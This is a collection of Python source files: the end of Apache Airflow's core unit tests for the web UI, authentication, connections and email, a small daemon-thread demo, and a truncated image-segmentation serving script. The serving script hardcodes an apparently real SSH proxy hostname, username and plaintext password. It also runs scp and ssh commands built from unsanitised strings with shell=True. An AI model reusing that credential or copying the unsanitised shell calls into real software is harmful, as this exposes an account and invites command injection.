"/admin/airflow/refresh?dag_id=example_bash_operator")
response = self.app.get("/admin/airflow/refresh_all")
response = self.app.post(
"/admin/airflow/paused?"
"dag_id=example_python_operator&is_paused=false")
self.assertIn("OK", response.data.decode('utf-8'))
response = self.app.get("/admin/xcom", follow_redirects=True)
self.assertIn("Xcoms", response.data.decode('utf-8'))
def test_charts(self):
session = Session()
chart_label = "Airflow task instance by type"
chart = session.query(
models.Chart).filter(models.Chart.label == chart_label).first()
chart_id = chart.id
session.close()
response = self.app.get(
'/admin/airflow/chart'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("Airflow task instance by type", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/chart_data'
'?chart_id={}&iteration_no=1'.format(chart_id))
self.assertIn("example", response.data.decode('utf-8'))
response = self.app.get(
'/admin/airflow/dag_details?dag_id=example_branch_operator')
self.assertIn("run_this_first", response.data.decode('utf-8'))
def test_fetch_task_instance(self):
url = (
"/admin/airflow/object/task_instances?"
"dag_id=example_python_operator&"
"execution_date={}".format(DEFAULT_DATE_DS))
response = self.app.get(url)
self.assertIn("print_the_context", response.data.decode('utf-8'))
def tearDown(self):
configuration.conf.set("webserver", "expose_config", "False")
self.dag_bash.clear(start_date=DEFAULT_DATE, end_date=timezone.utcnow())
session = Session()
session.query(models.DagRun).delete()
session.query(models.TaskInstance).delete()
session.commit()
session.close()
class SecureModeWebUiTests(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
configuration.conf.set("core", "secure_mode", "True")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def test_query(self):
response = self.app.get('/admin/queryview/')
self.assertEqual(response.status_code, 404)
def test_charts(self):
response = self.app.get('/admin/chart/')
self.assertEqual(response.status_code, 404)
def tearDown(self):
configuration.conf.remove_option("core", "SECURE_MODE")
class PasswordUserTest(unittest.TestCase):
def setUp(self):
user = models.User()
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user = PasswordUser(user)
self.password_user.username = "password_test"
@mock.patch('airflow.contrib.auth.backends.password_auth.generate_password_hash')
def test_password_setter(self, mock_gen_pass_hash):
mock_gen_pass_hash.return_value = b"hashed_pass" if six.PY3 else "hashed_pass"
self.password_user.password = "secure_password"
mock_gen_pass_hash.assert_called_with("secure_password", 12)
def test_password_unicode(self):
# In python2.7 no conversion is required back to str
# In python >= 3 the method must convert from bytes to str
self.password_user.password = "secure_password"
self.assertIsInstance(self.password_user.password, str)
def test_password_user_authenticate(self):
self.password_user.password = "secure_password"
self.assertTrue(self.password_user.authenticate("secure_password"))
def test_password_authenticate_session(self):
from airflow.contrib.auth.backends.password_auth import PasswordUser
self.password_user.password = 'test_password'
session = Session()
session.add(self.password_user)
session.commit()
query_user = session.query(PasswordUser).filter_by(
username=self.password_user.username).first()
self.assertTrue(query_user.authenticate('test_password'))
session.query(models.User).delete()
session.commit()
session.close()
class WebPasswordAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.password_auth")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
from airflow.contrib.auth.backends.password_auth import PasswordUser
session = Session()
user = models.User()
password_user = PasswordUser(user)
password_user.username = 'airflow_passwordauth'
password_user.password = 'password'
print(password_user._password)
session.add(password_user)
session.commit()
session.close()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_password_auth(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'whatever')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'wrongpassword')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('airflow_passwordauth', 'password')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized_password_auth(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class WebLdapAuthTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
app = application.create_app()
app.config['TESTING'] = True
self.app = app.test_client()
def get_csrf(self, response):
tree = html.fromstring(response.data)
form = tree.find('.//form')
return form.find('.//input[@name="_csrf_token"]').value
def login(self, username, password):
response = self.app.get('/admin/airflow/login')
csrf_token = self.get_csrf(response)
return self.app.post('/admin/airflow/login', data=dict(
username=username,
password=password,
csrf_token=csrf_token
), follow_redirects=True)
def logout(self):
return self.app.get('/admin/airflow/logout', follow_redirects=True)
def test_login_logout_ldap(self):
self.assertTrue(configuration.conf.getboolean('webserver', 'authenticate'))
response = self.login('user1', 'userx')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('userz', 'user1')
self.assertIn('Incorrect login details', response.data.decode('utf-8'))
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
def test_unauthorized(self):
response = self.app.get("/admin/airflow/landing_times")
self.assertEqual(response.status_code, 302)
def test_no_filter(self):
response = self.login('user1', 'user1')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
self.assertIn('Connections', response.data.decode('utf-8'))
def test_with_filters(self):
configuration.conf.set('ldap', 'superuser_filter',
'description=superuser')
configuration.conf.set('ldap', 'data_profiler_filter',
'description=dataprofiler')
response = self.login('dataprofiler', 'dataprofiler')
self.assertIn('Data Profiling', response.data.decode('utf-8'))
response = self.logout()
self.assertIn('form-signin', response.data.decode('utf-8'))
response = self.login('superuser', 'superuser')
self.assertIn('Connections', response.data.decode('utf-8'))
def tearDown(self):
configuration.load_test_config()
session = Session()
session.query(models.User).delete()
session.commit()
session.close()
configuration.conf.set("webserver", "authenticate", "False")
class LdapGroupTest(unittest.TestCase):
def setUp(self):
configuration.conf.set("webserver", "authenticate", "True")
configuration.conf.set("webserver", "auth_backend", "airflow.contrib.auth.backends.ldap_auth")
try:
configuration.conf.add_section("ldap")
except:
pass
configuration.conf.set("ldap", "uri", "ldap://localhost:3890")
configuration.conf.set("ldap", "user_filter", "objectClass=*")
configuration.conf.set("ldap", "user_name_attr", "uid")
configuration.conf.set("ldap", "bind_user", "cn=Manager,dc=example,dc=com")
configuration.conf.set("ldap", "bind_password", "insecure")
configuration.conf.set("ldap", "basedn", "dc=example,dc=com")
configuration.conf.set("ldap", "cacert", "")
def test_group_belonging(self):
from airflow.contrib.auth.backends.ldap_auth import LdapUser
users = {"user1": ["group1", "group3"],
"user2": ["group2"]
}
for user in users:
mu = models.User(username=user,
is_superuser=False)
auth = LdapUser(mu)
self.assertEqual(set(users[user]), set(auth.ldap_groups))
def tearDown(self):
configuration.load_test_config()
configuration.conf.set("webserver", "authenticate", "False")
class FakeWebHDFSHook(object):
def __init__(self, conn_id):
self.conn_id = conn_id
def get_conn(self):
return self.conn_id
def check_for_path(self, hdfs_path):
return hdfs_path
class FakeSnakeBiteClientException(Exception):
pass
class FakeSnakeBiteClient(object):
def __init__(self):
self.started = True
def ls(self, path, include_toplevel=False):
"""
the fake snakebite client
:param path: the array of path to test
:param include_toplevel: to return the toplevel directory info
:return: a list for path for the matching queries
"""
if path[0] == '/datadirectory/empty_directory' and not include_toplevel:
return []
elif path[0] == '/datadirectory/datafile':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/datafile'
}]
elif path[0] == '/datadirectory/empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}]
elif path[0] == '/datadirectory/not_empty_directory' and include_toplevel:
return [{
'group': u'supergroup',
'permission': 493,
'file_type': 'd',
'access_time': 0,
'block_replication': 0,
'modification_time': 1481132141540,
'length': 0,
'blocksize': 0,
'owner': u'hdfs',
'path': '/datadirectory/empty_directory'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_empty_directory':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 0,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/not_empty_directory/test_file'
}]
elif path[0] == '/datadirectory/not_existing_file_or_directory':
raise FakeSnakeBiteClientException
elif path[0] == '/datadirectory/regex_dir':
return [{
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862, 'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test1file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test2file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/test3file'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_1.txt._COPYING_'
}, {
'group': u'supergroup',
'permission': 420,
'file_type': 'f',
'access_time': 1481122343796,
'block_replication': 3,
'modification_time': 1481122343862,
'length': 12582912,
'blocksize': 134217728,
'owner': u'hdfs',
'path': '/datadirectory/regex_dir/copying_file_3.txt.sftp'
}]
else:
raise FakeSnakeBiteClientException
class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
HDFSHook = None
if six.PY2:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='utf-8', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
daemon_thread.py
|
#!/usr/bin/env python3
""" Barron finishes cooking while Olivia cleans """
import threading
import time
def kitchen_cleaner():
while True:
print('Olivia cleaned the kitchen.')
time.sleep(1)
if __name__ == '__main__':
olivia = threading.Thread(target=kitchen_cleaner)
olivia.daemon = True
olivia.start()
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is cooking...')
time.sleep(0.6)
print('Barron is done!')
|
pspnet_serving.py
|
from __future__ import print_function
from __future__ import division
import time
import os
import subprocess
from os.path import splitext, join, isfile, basename
from os import environ
from math import ceil
import argparse
import numpy as np
from scipy import misc, ndimage
import pre_process
import deeplearning
import img_combine2
from psp_tf.pspnet import PSPNet50
from socketIO_client import SocketIO, LoggingNamespace, BaseNamespace
from async_socketIO import async_socketIO
from collections import namedtuple
import sshtunnel
import pysftp
import utils
import uuid
import json
import tqdm
import multiprocessing
from multiprocessing import Queue, Lock
import logging
# init tensorflow
from keras.backend.tensorflow_backend import set_session
from keras import backend as K
import tensorflow as tf
# init global lock
mutex = Lock()
mutex1 = Queue(1)
mutex2 = Queue(1)
mutex_data = None
# end init global lock
class task():
"""
mainthread:
True : need to maintain the run() in the main thread to provide service
False : auto create process to provide service
handler_type:
"file" : using file as status and args transfer tool
"queue" : build-in queue transfer
"""
mainthread = False
handler_type = 'None'
def prepare(self):
"""
using to init before running code
"""
self.remote_uuid = "{0}{1}".format(uuid.uuid4(), "_deeplearning")
self.socketIO = SocketIO('localhost', 30091, LoggingNamespace)
class pspnet_pre(task):
handler_type = "Process"
handle = ""
mainthread = False
def prepare(self):
task.prepare(self)
def deploy(self):
pass
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
print(local_id)
args_d['local_id'] = local_id
p = multiprocessing.Process(
target=self.run, args=(json.dumps(args_d), ))
p.start()
p.join()
def run(self, args_s):
args_d = json.loads(args_s)
iname = args_d['panid']
self.socketIO.emit('update', {'id': iname, "phase": 1, 'val': -1, 'max': -1})
self.socketIO.wait(seconds=1)
print("{0} start pre".format(args_d['local_id']))
pre_process.pre_process(
namedtuple('Struct', args_d.keys())(*args_d.values()))
class pspnet_img_combine(task):
handler_type = "Queue"
handle = ""
mainthread = False
def prepare(self):
task.prepare(self)
self.requestQueue = multiprocessing.Queue()
self.responseQueue = multiprocessing.Queue()
def deploy(self):
pass
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
args_d['local_id'] = local_id
p = multiprocessing.Process(
target=self.run, args=(json.dumps(args_d), ))
p.start()
p.join()
def run(self, args_s=""):
args_d = json.loads(args_s)
iname = args_d['panid']
ext = args_d['ext']
filename = args_d['filename']
self.socketIO.emit('update', {'id': iname, "phase": 3, 'val': -1, 'max': -1})
self.socketIO.wait(seconds=1)
class_scores = img_combine2.img_combine2(
namedtuple('Struct', args_d.keys())(*args_d.values()))
print("blended...")
img = misc.imread("./{0}{1}".format(panid, ext))
img = misc.imresize(img, 10)
class_image = np.argmax(class_scores, axis=2)
pm = np.max(class_scores, axis=2)
colored_class_image = utils.color_class_image(class_image,
args_d['model'])
#colored_class_image is [0.0-1.0] img is [0-255]
alpha_blended = 0.5 * colored_class_image + 0.5 * img
misc.imsave(panid + "_seg_blended" + ext, alpha_blended)
# for filename in tqdm.tqdm(os.listdir('/tmp')):
# if filename.endswith(".npy"):
# try:
# os.remove(filename)
# except Exception:
# pass
self.socketIO.emit('update', {'id': iname, "phase": 3, 'val': 1, 'max': 1})
self.socketIO.wait(seconds=1)
self.responseQueue.put(args_d['local_id'])
class pspnet_dl(task):
mainthread = True
handler_type = 'Queue'
handler = ""
def prepare(self):
task.prepare(self)
self.requestQueue = multiprocessing.Queue()
self.responseQueue = multiprocessing.Queue()
self.mutex = multiprocessing.Lock()
config = tf.ConfigProto()
# config.gpu_options.allow_growth = True
# config.gpu_options.per_process_gpu_memory_fraction = 0.4
self.sess = tf.Session(config=config)
set_session(self.sess)
self.pspnet = PSPNet50(
nb_classes=150,
input_shape=(473, 473),
weights="pspnet50_ade20k",
path="./pspnet/weights")
# end
def ask_and_wait(self, args_d):
local_id = "{0}".format(uuid.uuid4())
args_d['local_id'] = local_id
self.requestQueue.put(args_d)
while (1):
p = self.responseQueue.get()
if p == local_id:
break
self.responseQueue.put(p)
def run(self):
# print("waiting for task")
# try:
args_d = self.requestQueue.get()
args_d['sess'] = self.sess
args_d['model_ok'] = self.pspnet
args_d['remote_uuid'] = self.remote_uuid
args_d['socketIO'] = self.socketIO
global_arg = namedtuple('Struct', args_d.keys())(*args_d.values())
deeplearning.deep_process(global_arg)
self.responseQueue.put(args_d['local_id'])
time.sleep(1)
pspnet_dl_in = pspnet_dl()
pspnet_pre_in = pspnet_pre()
pspnet_img_combine_in = pspnet_img_combine()
tasks = [pspnet_pre_in, pspnet_dl_in, pspnet_img_combine_in]
# config
config_p1_folder = '/dev/shm/guxi/p1'
config_p2_folder = '/dev/shm/guxi/p2'
config_p3_folder = '/dev/shm/guxi/p3'
# init remote link
data = {
"proxy": {
"host": "star.eecs.oregonstate.edu",
"username": "guxi",
"password": "cft6&UJM",
"port": 22,
},
}
def ftunnel(*args):
client = args[-1]
if type(client) == dict:
client = namedtuple('Struct', client.keys())(*client.values())
cmd = "ssh -NR {0}:{1}:{2} {3}@{4} -p {5} >/dev/null".format(
args[0], args[1], args[2], client.username, client.host, client.port)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
def scp_download(port, user, host, path):
cmd = "scp -P {0} {1}@{2}:{3} ./".format(port, user, host, path)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
def scp_upload(port, user, host, path, file):
cmd = "scp -P {0} ./{4} {1}@{2}:{3} ".format(port, user, host, path, file)
logging.info(cmd)
ret = subprocess.call(cmd, shell=True)
mutex_ssh = multiprocessing.Lock()
def sshdownload(data):
global mutex_ssh
mutex_ssh.acquire()
#start tunnel
# tunnel_p = multiprocessing.Process(
# target=ftunnel,
# args=(50033, data['ssh']['host'], data['ssh']['port'], data['proxy']))
# tunnel_p.start()
#do scp_download
print("downloading {0}...".format(data['input_path']))
scp_download(data['ssh']['port'], data['ssh']['username'], "127.0.0.1",
data['input_path'])
# p.terminate()
mutex_ssh.release()
def sshupload(data, path):
global mutex_ssh
mutex_ssh.acquire()
#start tunnel
# tunnel_p = multiprocessing.Process(
# target=ftunnel,
# args=(50033, data['ssh']['host'], data['ssh']['port'], data['proxy']))
# tunnel_p.start()
#do scp_download
print("uploading {0}...".format(data['input_path']))
scp_upload(data['ssh']['port'], data['ssh']['username'], "127.0.0.1",
data["output_path"], path)
# p.terminate()
mutex_ssh.release()
def task_process(args, sio):
print("got request")
data = args[0]
filename, ext = splitext(data['input_path'])
panid = basename(filename)
# download file from upper server
print("download...")
sshdownload(data)
args_d = {}
args_d['panid'] = panid
args_d['filename'] = filename
args_d['ext'] = ext
args_d['model'] = "pspnet50_ade20k"
args_d['sliding'] = True
args_d['flip'] = True
args_d['multi_scale'] = True
print("phase 1...")
args_d['input_path'] = "./{0}{1}".format(panid, ext)
args_d['output_path'] = "{2}/{0}{1}".format(panid, ext, config_p1_folder)
pspnet_pre_in.ask_and_wait(args_d=args_d)
print("phase 2...")
# args_d['sess']=sess
# args_d['model_ok']=pspnet
args_d['input_path'] = config_p1_folder + '/'
args_d['input_path_filter'] = panid
args_d['output_path'] = config_p2_folder + '/'
pspnet_dl_in.ask_and_wait(args_d)
print("phase 3...")
args_d['input_path'] = "./{0}{1}".format(panid, ext)
args_d['input_path2'] = "{2}/{0}{1}".format(panid, ext, config_p2_folder)
args_d['output_path'] = "{2}/{0}{1}".format(panid, ext, config_p3_folder)
pspnet_img_combine_in.ask_and_wait(args_d)
print("upload...")
sshupload(data, panid + "_seg_blended" + ext)
print("garbage cleaning")
print("success")
sio.emit("next", data)
# global data storage
class Pspnet_namespace(BaseNamespace):
def on_asknext(self, *args):
self.emit("next", None)
def on_request(self, *args):
